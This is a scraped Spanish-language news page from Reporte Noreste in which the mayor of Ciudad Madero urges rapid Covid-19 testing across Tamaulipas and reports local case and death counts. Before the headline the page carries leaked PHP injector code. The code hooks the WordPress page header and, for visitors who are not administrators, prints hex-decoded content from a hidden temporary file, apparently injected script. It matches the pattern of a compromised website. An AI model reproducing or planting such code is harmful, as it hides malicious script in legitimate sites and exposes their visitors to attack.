if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Necesarias las pruebas rápidas para detectar Covid-19: AOK – Reporte Noreste
Conéctate con nosotros

Sur de Tamaulipas

Necesarias las pruebas rápidas para detectar Covid-19: AOK

Necesarias las pruebas rápidas para detectar Covid-19: AOK

Ciudad Madero Tamps.- De forma coloquial y haciendo un llamado a la Secretaría de Salud de Tamaulipas, Adrián Oseguera Kernion alcalde de Madero insiste en que los 43 municipios de Tamaulipas hagan la tradicional «Polla» para adquirir recursos económicos y realizar pruebas rápidas de Covid-19 a toda la población de cada municipio.

Agregó además de que se debe autorizar más laboratorios certificados para dichas pruebas y bajar los costos de las mismas que oscilan en más de 3,500 pesos, que mucha gente no puede pagar.

Oseguera Kernion dijo, que, al realizarse las pruebas rápidas, de manera inmediata se atacaría el avance de la Pandemia y se salvarían más vidas.

MADERO CONTABILIZA 49 DECESOS POR COVID-19

Con más de 1,400 contagios de Covid-19 en Madero y 49 defunciones y un pronóstico nada favorable del avance de la Pandemia en el municipio, de manera reiterativa y por enésima ocasión Oseguera Kernion exhorta a la población a obedecer las medidas sanitarias de prevención y quedarse en casa.

Mencionó el alcalde que cada vez es más común, conocer del círculo cercano de cada persona, familiares y amigos fallecidos a causa del Coronavirus.

Lic. En Psicología Clínica por la UNE, Diplomado en Sexualidad Humana por la UNAM, LCC – UAT. Inició carrera en medios de comunicación en 1996.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Sur de Tamaulipas